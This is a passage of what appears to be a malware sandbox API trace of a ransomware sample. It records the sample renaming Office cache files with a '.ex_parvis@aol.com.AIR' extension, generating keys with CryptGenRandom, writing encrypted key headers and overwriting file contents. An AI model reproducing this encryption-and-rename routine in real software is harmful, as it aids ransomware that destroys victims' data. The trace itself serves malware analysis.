[0162.361] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0162.361] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", dwFileAttributes=0x80) returned 1 [0162.362] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 82 [0162.362] GetProcessHeap () returned 0x2e0000 [0162.362] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x336dd8 [0162.362] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" [0162.362] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0162.362] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0162.366] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x514 [0162.366] GetProcessHeap () returned 0x2e0000 [0162.366] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0162.366] GetFileSizeEx (in: hFile=0x514, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1457) returned 1 [0162.366] SetFilePointer (in: hFile=0x514, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x5b1 [0162.366] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0162.366] GetProcessHeap () returned 0x2e0000 [0162.366] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0162.366] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0162.366] WriteFile (in: hFile=0x514, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0162.368] WriteFile (in: hFile=0x514, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0162.368] WriteFile (in: hFile=0x514, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0162.368] ReadFile (in: hFile=0x514, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x5b1, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x5b1, lpOverlapped=0x0) returned 1 [0162.368] SetFilePointer (in: hFile=0x514, lDistanceToMove=-1457, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.368] WriteFile (in: hFile=0x514, lpBuffer=0x31d07a0*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d07a0*, lpNumberOfBytesWritten=0x2acf9c8*=0x5b1, lpOverlapped=0x0) returned 1 [0162.368] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0162.368] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0162.368] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi", dwFileAttributes=0x80) returned 1 [0162.369] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 82 [0162.369] GetProcessHeap () returned 0x2e0000 [0162.369] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x336dd8 [0162.369] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" [0162.369] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0162.369] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0162.371] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x514 [0162.372] GetProcessHeap () returned 0x2e0000 [0162.372] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0162.372] GetFileSizeEx (in: hFile=0x514, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=881152) returned 1 [0162.372] SetFilePointer (in: hFile=0x514, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd7200 [0162.372] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0162.372] GetProcessHeap () returned 0x2e0000 [0162.372] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0162.372] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0162.372] WriteFile (in: hFile=0x514, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0162.375] WriteFile (in: hFile=0x514, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0162.375] WriteFile (in: hFile=0x514, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0162.376] ReadFile (in: hFile=0x514, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xd7200, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xd7200, lpOverlapped=0x0) returned 1 [0162.408] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0162.408] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0162.408] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", dwFileAttributes=0x80) returned 1 [0162.408] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 82 [0162.408] GetProcessHeap () returned 0x2e0000 [0162.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x336dd8 [0162.408] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" [0162.409] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0162.409] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0162.411] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x514 [0162.411] GetProcessHeap () returned 0x2e0000 [0162.411] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0162.411] GetFileSizeEx (in: hFile=0x514, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=13642474) returned 1 [0162.411] SetFilePointer (in: hFile=0x514, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd02aea [0162.411] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0162.411] GetProcessHeap () returned 0x2e0000 [0162.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0162.411] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0162.412] WriteFile (in: hFile=0x514, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0162.413] WriteFile (in: hFile=0x514, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0162.414] WriteFile (in: hFile=0x514, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0162.414] ReadFile (in: hFile=0x514, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xd02aea, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xd02aea, lpOverlapped=0x0) returned 1 [0163.189] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa2966c70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xa2966c70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b15a8 [0163.190] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0163.190] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0163.190] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", dwFileAttributes=0x80) returned 1 [0163.190] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 82 [0163.191] GetProcessHeap () returned 0x2e0000 [0163.191] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x336dd8 [0163.191] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" [0163.191] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0163.191] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0163.196] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x518 [0163.196] GetProcessHeap () returned 0x2e0000 [0163.196] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0163.196] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1458) returned 1 [0163.196] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x5b2 [0163.196] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0163.196] GetProcessHeap () returned 0x2e0000 [0163.196] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0163.196] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0163.196] WriteFile (in: hFile=0x518, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0163.201] WriteFile (in: hFile=0x518, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0163.201] WriteFile (in: hFile=0x518, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0163.201] ReadFile (in: hFile=0x518, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x5b2, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x5b2, lpOverlapped=0x0) returned 1 [0163.201] SetFilePointer (in: hFile=0x518, lDistanceToMove=-1458, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.201] WriteFile (in: hFile=0x518, lpBuffer=0x31d07a0*, nNumberOfBytesToWrite=0x5b2, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d07a0*, lpNumberOfBytesWritten=0x2acf9c8*=0x5b2, lpOverlapped=0x0) returned 1 [0163.204] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0163.204] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0163.204] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", dwFileAttributes=0x80) returned 1 [0163.204] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 82 [0163.204] GetProcessHeap () returned 0x2e0000 [0163.204] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x336dd8 [0163.204] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" [0163.205] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0163.205] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0163.208] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x518 [0163.208] GetProcessHeap () returned 0x2e0000 [0163.208] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0163.208] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=885760) returned 1 [0163.208] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd8400 [0163.208] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0163.208] GetProcessHeap () returned 0x2e0000 [0163.208] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0163.208] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0163.208] WriteFile (in: hFile=0x518, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0163.218] WriteFile (in: hFile=0x518, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0163.219] WriteFile (in: hFile=0x518, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0163.219] ReadFile (in: hFile=0x518, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xd8400, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xd8400, lpOverlapped=0x0) returned 1 [0163.257] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0163.257] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0163.257] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", dwFileAttributes=0x80) returned 1 [0163.257] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 82 [0163.257] GetProcessHeap () returned 0x2e0000 [0163.257] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x336dd8 [0163.258] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All 